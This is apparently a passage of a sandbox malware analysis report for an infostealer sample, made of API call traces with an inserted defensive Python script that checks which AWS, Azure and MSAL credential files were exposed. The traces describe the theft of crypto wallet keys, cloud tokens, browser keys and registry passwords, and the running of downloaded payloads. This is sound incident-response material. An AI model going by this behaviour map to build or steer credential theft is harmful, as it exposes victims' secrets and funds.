                            • RtlAllocateHeap.NTDLL(00000000), ref: 003BD0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 003BD208
                            • lstrcat.KERNEL32(?,003D1478), ref: 003BD217
                            • lstrcat.KERNEL32(?,00000000), ref: 003BD22A
                            • lstrcat.KERNEL32(?,003D147C), ref: 003BD239
                            • lstrcat.KERNEL32(?,00000000), ref: 003BD24C
                            • lstrcat.KERNEL32(?,003D1480), ref: 003BD25B
                            • lstrcat.KERNEL32(?,00000000), ref: 003BD26E
                            • lstrcat.KERNEL32(?,003D1484), ref: 003BD27D
                            • lstrcat.KERNEL32(?,00000000), ref: 003BD290
                            • lstrcat.KERNEL32(?,003D1488), ref: 003BD29F
                            • lstrcat.KERNEL32(?,00000000), ref: 003BD2B2
                            • lstrcat.KERNEL32(?,003D148C), ref: 003BD2C1
                            • lstrcat.KERNEL32(?,00000000), ref: 003BD2D4
                            • lstrcat.KERNEL32(?,003D1490), ref: 003BD2E3
                              • Part of subcall function 003CA820: lstrlen.KERNEL32(003B4F05,?,?,003B4F05,003D0DDE), ref: 003CA82B
                              • Part of subcall function 003CA820: lstrcpy.KERNEL32(003D0DDE,00000000), ref: 003CA885
                            • lstrlen.KERNEL32(?), ref: 003BD32A
                            • lstrlen.KERNEL32(?), ref: 003BD339
                              • Part of subcall function 003CAA70: StrCmpCA.SHLWAPI(01089168,003BA7A7,?,003BA7A7,01089168), ref: 003CAA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 003BD3B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 27fc1dcd9335b859a5deeeb5efe03bd0dfcbe8bb97233b7140e48e3ab40eb800
                            • Instruction ID: f8c618a305e5b9c28a052e011bbae6cfd6f99e82883b9afe5955893b8f4b27fe
                            • Opcode Fuzzy Hash: 27fc1dcd9335b859a5deeeb5efe03bd0dfcbe8bb97233b7140e48e3ab40eb800
                            • Instruction Fuzzy Hash: 13E110B1910608ABCB06EBA0DD96FEE7778BF14305F104159F106FA191DE35AE09DB63
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0108D4A0,00000000,?,003D144C,00000000,?,?), ref: 003BCA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 003BCA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 003BCA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 003BCAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 003BCAD9
                            • StrStrA.SHLWAPI(?,0108D4B8,003D0B52), ref: 003BCAF7
                            • StrStrA.SHLWAPI(00000000,0108D4D0), ref: 003BCB1E
                            • StrStrA.SHLWAPI(?,0108DC80,00000000,?,003D1458,00000000,?,00000000,00000000,?,010891C8,00000000,?,003D1454,00000000,?), ref: 003BCCA2
                            • StrStrA.SHLWAPI(00000000,0108DB20), ref: 003BCCB9
                              • Part of subcall function 003BC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 003BC871
                              • Part of subcall function 003BC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 003BC87C
                            • StrStrA.SHLWAPI(?,0108DB20,00000000,?,003D145C,00000000,?,00000000,010891D8), ref: 003BCD5A
                            • StrStrA.SHLWAPI(00000000,010890A8), ref: 003BCD71
                              • Part of subcall function 003BC820: lstrcat.KERNEL32(?,003D0B46), ref: 003BC943
                              • Part of subcall function 003BC820: lstrcat.KERNEL32(?,003D0B47), ref: 003BC957
                              • Part of subcall function 003BC820: lstrcat.KERNEL32(?,003D0B4E), ref: 003BC978
                            • lstrlen.KERNEL32(00000000), ref: 003BCE44
                            • CloseHandle.KERNEL32(00000000), ref: 003BCE9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: 6fa107ca6deb1e427393ae39f7162072ae2f0a49e48b1554c8ba8b55a4845f6a
                            • Instruction ID: 3255a0c4179ca9e49b5d9022c4a5255771aa30676ee30b490ffe44e9c07d378b
                            • Opcode Fuzzy Hash: 6fa107ca6deb1e427393ae39f7162072ae2f0a49e48b1554c8ba8b55a4845f6a
                            • Instruction Fuzzy Hash: BDE110B191060CABDB16EBA0DC96FEEB778AF14304F40415DF106EA191DF346E4ACB66
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • RegOpenKeyExA.ADVAPI32(00000000,0108B288,00000000,00020019,00000000,003D05B6), ref: 003C83A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003C8426
                            • wsprintfA.USER32 ref: 003C8459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 003C847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 003C848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 003C8499
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: 54f5d49b7a89fdd67113fe3279df56bf77124b2de8183a8e3980207cbd16a707
                            • Instruction ID: 13028e42dfaad457788aa40996ee3d8b5e3610394db36a386b73d5a9f1e0bbff
                            • Opcode Fuzzy Hash: 54f5d49b7a89fdd67113fe3279df56bf77124b2de8183a8e3980207cbd16a707
                            • Instruction Fuzzy Hash: 66810BB191021CABDB25DB50CC95FEAB7B8FB18704F008299E109E6140DF756F89CF95
                            APIs
                              • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 003C4DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 003C4DCD
                              • Part of subcall function 003C4910: wsprintfA.USER32 ref: 003C492C
                              • Part of subcall function 003C4910: FindFirstFileA.KERNEL32(?,?), ref: 003C4943
                            • lstrcat.KERNEL32(?,00000000), ref: 003C4E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 003C4E59
                              • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D0FDC), ref: 003C4971
                              • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D0FE0), ref: 003C4987
                              • Part of subcall function 003C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003C4B7D
                              • Part of subcall function 003C4910: FindClose.KERNEL32(000000FF), ref: 003C4B92
                            • lstrcat.KERNEL32(?,00000000), ref: 003C4EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 003C4EE5
                              • Part of subcall function 003C4910: wsprintfA.USER32 ref: 003C49B0
                              • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D08D2), ref: 003C49C5
                              • Part of subcall function 003C4910: wsprintfA.USER32 ref: 003C49E2
                              • Part of subcall function 003C4910: PathMatchSpecA.SHLWAPI(?,?), ref: 003C4A1E
                              • Part of subcall function 003C4910: lstrcat.KERNEL32(?,0108E7E8), ref: 003C4A4A
                              • Part of subcall function 003C4910: lstrcat.KERNEL32(?,003D0FF8), ref: 003C4A5C
                              • Part of subcall function 003C4910: lstrcat.KERNEL32(?,?), ref: 003C4A70
                              • Part of subcall function 003C4910: lstrcat.KERNEL32(?,003D0FFC), ref: 003C4A82
                              • Part of subcall function 003C4910: lstrcat.KERNEL32(?,?), ref: 003C4A96
                              • Part of subcall function 003C4910: CopyFileA.KERNEL32(?,?,00000001), ref: 003C4AAC
                              • Part of subcall function 003C4910: DeleteFileA.KERNEL32(?), ref: 003C4B31
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: ae58852ece91987a7c1a1deb70f1d26e8cb318bae67c0f09aea69c7088aa803c
                            • Instruction ID: e307828eb1cf2611d46166c3de94dc39bf1c2c69f3af125f556df254657c2900
                            • Opcode Fuzzy Hash: ae58852ece91987a7c1a1deb70f1d26e8cb318bae67c0f09aea69c7088aa803c
                            • Instruction Fuzzy Hash: 0641A3BA94020867D711F770EC47FED7338AB24704F404859B249AA1C1EEB45BC98B93
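The record above shows the sample's cloud-credential collector: it resolves a base folder with SHGetFolderPathA, appends \.azure\, \.aws\ and \.IdentityService\, enumerates each directory with FindFirstFileA/FindNextFileA, filters names with PathMatchSpecA against *.* and msal.cache, and copies matches with CopyFileA before deleting the staged copy. The following is an added example (not code from the report or from the sample) that applies the same directory and pattern set to a given root and lists which files a run on that host would have collected, which is the first thing a responder wants to know after a Stealc infection. The root layout, file names and file contents are constructed for the demonstration; whether the sample resolves the base folder to the user profile or to local application data is not visible in the trace and is left to the caller.

```python
"""Exposure check for the cloud-credential paths this sample harvests.

Added example, not part of the Joe Sandbox report or of the sample. The
directory/pattern pairs are taken from the String IDs of the function above;
everything else (root layout, file names) is constructed for the demo.
"""
import fnmatch
import os
import tempfile
from pathlib import Path

# Directory -> filename patterns, as seen in the function's strings.
# The sample applies each pattern with PathMatchSpecA. "*.*" is treated here as
# "every file" to mirror Win32 matching (assumption: plain fnmatch would
# otherwise require a dot in the name).
TARGETS = {
    ".azure": ["*.*"],
    ".aws": ["*.*"],
    ".IdentityService": ["*.*", "msal.cache"],
}


def _matches(name: str, pattern: str) -> bool:
    if pattern == "*.*":
        return True
    return fnmatch.fnmatchcase(name.lower(), pattern.lower())


def find_targeted_files(root: str) -> list:
    """Return the relative paths (forward-slash form, sorted) under root that
    the collector would copy out."""
    hits = []
    for subdir, patterns in TARGETS.items():
        base = Path(root) / subdir
        if not base.is_dir():
            continue
        # The trace shows one FindFirstFileA/FindNextFileA loop per directory
        # with "." and ".." skipped; recursion into sub-folders is not visible,
        # so only the top level is listed here.
        for entry in base.iterdir():
            if entry.is_file() and any(_matches(entry.name, p) for p in patterns):
                hits.append(f"{subdir}/{entry.name}")
    return sorted(hits)


def demo_layout(root: str) -> None:
    """Create a constructed profile layout for the demonstration."""
    for rel in [".aws/credentials", ".aws/config", ".azure/azureProfile.json",
                ".azure/msal_token_cache.bin", ".IdentityService/msal.cache",
                "Documents/notes.txt"]:
        p = Path(root) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text("constructed sample content\n")


def run_demo() -> list:
    """Build the constructed layout in a temp dir and return what would be taken."""
    with tempfile.TemporaryDirectory() as tmp:
        demo_layout(tmp)
        return find_targeted_files(tmp)


if __name__ == "__main__":
    # On a live host, point this at the user's profile and at %LOCALAPPDATA%
    # (assumption about where the sample resolves its base folder).
    for hit in run_demo():
        print(hit)
```

Everything the function lists is a credential or token cache (AWS access keys in .aws/credentials, Azure CLI profile and MSAL token cache, the shared MSAL cache used by Office and Visual Studio), so every hit is a secret to rotate, not just a file to restore.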
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 003C906C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: dabf7dfc52e55501922344d19852cad9a1951aef1aaf576da7ce07310c594f8d
                            • Instruction ID: f48e6ab5dd39bdca4e24dc9d973642f6760fd6ad842b3a1210d679fe63cbe52d
                            • Opcode Fuzzy Hash: dabf7dfc52e55501922344d19852cad9a1951aef1aaf576da7ce07310c594f8d
                            • Instruction Fuzzy Hash: 8A71EFB1910208ABDB14EFE4DC89FEDB7B8BB58700F108509F515EB294DB78A905DB62
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003C31C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003C335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003C34EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: bd01ec339d1fd26c7097ea46ca05a5d7fd9c39a6bdedda8df0d7a6b53010d2f0
                            • Instruction ID: a7bdadb506d92cc980b89c9d6822fa0941d7b98f906d19175dd8642c7ef55efe
                            • Opcode Fuzzy Hash: bd01ec339d1fd26c7097ea46ca05a5d7fd9c39a6bdedda8df0d7a6b53010d2f0
                            • Instruction Fuzzy Hash: 5F12DC7181060C9BDB1AEBA0DC92FEEB778AF14304F50415DE506AA191EF742F4ACF66
                            APIs
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B6280: InternetOpenA.WININET(003D0DFE,00000001,00000000,00000000,00000000), ref: 003B62E1
                              • Part of subcall function 003B6280: StrCmpCA.SHLWAPI(?,0108E7B8), ref: 003B6303
                              • Part of subcall function 003B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B6335
                              • Part of subcall function 003B6280: HttpOpenRequestA.WININET(00000000,GET,?,0108DFD8,00000000,00000000,00400100,00000000), ref: 003B6385
                              • Part of subcall function 003B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003B63BF
                              • Part of subcall function 003B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B63D1
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C5318
                            • lstrlen.KERNEL32(00000000), ref: 003C532F
                              • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 003C5364
                            • lstrlen.KERNEL32(00000000), ref: 003C5383
                            • lstrlen.KERNEL32(00000000), ref: 003C53AE
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: 9ea668a929b175c27087ee2dcbc3135f09252d8a829958eb1c8c7322d47a5507
                            • Instruction ID: 44f60df51b44011b547b537569a545ee443893858cde7daee09953953b34adb2
                            • Opcode Fuzzy Hash: 9ea668a929b175c27087ee2dcbc3135f09252d8a829958eb1c8c7322d47a5507
                            • Instruction Fuzzy Hash: 9651F77091064CABCB1AFF60D996FEE7B79AF10308F50401CE50A9A592EF346F45DB62
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 68592796cbeae1470943ffb4bd781025a47a59c085915f9c3f88dd36091f9af1
                            • Instruction ID: 69fd9948188713a4bacbd3bc8f43750daec8b6cbf6490fd2995f81c330f80f5a
                            • Opcode Fuzzy Hash: 68592796cbeae1470943ffb4bd781025a47a59c085915f9c3f88dd36091f9af1
                            • Instruction Fuzzy Hash: EDC180B590020D9BCB15EF60DC89FEA7778BB64304F00459DF50AEB241EA74AE85DF92
                            APIs
                              • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 003C42EC
                            • lstrcat.KERNEL32(?,0108E470), ref: 003C430B
                            • lstrcat.KERNEL32(?,?), ref: 003C431F
                            • lstrcat.KERNEL32(?,0108D530), ref: 003C4333
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003C8D90: GetFileAttributesA.KERNEL32(00000000,?,003B1B54,?,?,003D564C,?,?,003D0E1F), ref: 003C8D9F
                              • Part of subcall function 003B9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003B9D39
                              • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                              • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                              • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                              • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                              • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                              • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                              • Part of subcall function 003C93C0: GlobalAlloc.KERNEL32(00000000,003C43DD,003C43DD), ref: 003C93D3
                            • StrStrA.SHLWAPI(?,0108E5C0), ref: 003C43F3
                            • GlobalFree.KERNEL32(?), ref: 003C4512
                              • Part of subcall function 003B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9AEF
                              • Part of subcall function 003B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,003B4EEE,00000000,?), ref: 003B9B01
                              • Part of subcall function 003B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9B2A
                              • Part of subcall function 003B9AC0: LocalFree.KERNEL32(?,?,?,?,003B4EEE,00000000,?), ref: 003B9B3F
                            • lstrcat.KERNEL32(?,00000000), ref: 003C44A3
                            • StrCmpCA.SHLWAPI(?,003D08D1), ref: 003C44C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 003C44D2
                            • lstrcat.KERNEL32(00000000,?), ref: 003C44E5
                            • lstrcat.KERNEL32(00000000,003D0FB8), ref: 003C44F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
• Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: 0829d83d5a35cb7c4fc62a856190e550a2ce7c251333182578155c1395c1f7db
                            • Instruction ID: be8b646f55fd2089d6853d0223bc831c18db3fec6c4059e029eaa1fb413d7dfb
                            • Opcode Fuzzy Hash: 0829d83d5a35cb7c4fc62a856190e550a2ce7c251333182578155c1395c1f7db
                            • Instruction Fuzzy Hash: 627177B6900208ABCB15EBA0DC95FEE7379AB48304F00459CF609E7181DA75DB49DF92
                            APIs
                              • Part of subcall function 003B12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B12B4
                              • Part of subcall function 003B12A0: RtlAllocateHeap.NTDLL(00000000), ref: 003B12BB
                              • Part of subcall function 003B12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003B12D7
                              • Part of subcall function 003B12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003B12F5
                              • Part of subcall function 003B12A0: RegCloseKey.ADVAPI32(?), ref: 003B12FF
                            • lstrcat.KERNEL32(?,00000000), ref: 003B134F
                            • lstrlen.KERNEL32(?), ref: 003B135C
                            • lstrcat.KERNEL32(?,.keys), ref: 003B1377
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0108A270,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 003B1465
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                              • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                              • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                              • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                              • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                              • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 003B14EF
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 26ac3a920d9eefd8633d21e3e085e6855621c88939e5650373f3e9a7d62fbe87
                            • Instruction ID: 9024eff7fe80a70003d22b7420687b43951ba4c576ac897e982c35b43cc82743
                            • Opcode Fuzzy Hash: 26ac3a920d9eefd8633d21e3e085e6855621c88939e5650373f3e9a7d62fbe87
                            • Instruction Fuzzy Hash: F1514FB295021C5BCB16EB60DC96FED737CAB54304F40459CB60AE6081EE346F89CBA6
                            APIs
                              • Part of subcall function 003B72D0: memset.MSVCRT ref: 003B7314
                              • Part of subcall function 003B72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003B733A
                              • Part of subcall function 003B72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003B73B1
                              • Part of subcall function 003B72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003B740D
                              • Part of subcall function 003B72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 003B7452
                              • Part of subcall function 003B72D0: HeapFree.KERNEL32(00000000), ref: 003B7459
                            • lstrcat.KERNEL32(00000000,003D17FC), ref: 003B7606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 003B7648
                            • lstrcat.KERNEL32(00000000, : ), ref: 003B765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 003B768F
                            • lstrcat.KERNEL32(00000000,003D1804), ref: 003B76A0
